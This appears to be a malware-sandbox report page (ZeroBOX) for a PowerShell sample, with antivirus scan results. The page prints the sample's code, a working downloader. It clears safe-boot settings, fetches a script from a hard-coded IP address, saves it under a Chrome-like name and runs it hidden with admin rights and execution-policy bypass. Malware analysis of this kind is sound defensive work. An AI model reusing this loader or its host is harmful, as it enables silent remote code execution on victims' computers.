Static | ZeroBOX
No static analysis available.
digo del archivo .bat
$CodigoBat = @"
@echo off
bcdedit /deletevalue {current} safeboot
powershell -command "Invoke-WebRequest -Uri 'http://64.94.84.206/plug3.ps1' -OutFile 'C:\Users\Public\Documents\chrome.ps1'"
powershell -Command "Start-Process 'powershell.exe' -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Public\Documents\chrome.ps1""' -Verb RunAs"
# Ruta donde se guardar
el archivo .bat
$RutaBat = "C:\Users\Public\Documents\29389023.bat"
# Guardar el contenido en un archivo .bat
$CodigoBat | Out-File -FilePath $RutaBat -Encoding ascii
# Ejecutar el archivo .bat
Start-Process -FilePath $RutaBat
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
Cynet Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec ISB.Downloader!gen73
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
TACHYON Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
FireEye Clean
Emsisoft Clean
huorong HEUR:TrojanDownloader/PS.NetLoader.ae
GData Clean
Jiangmin Clean
Varist Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Clean
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.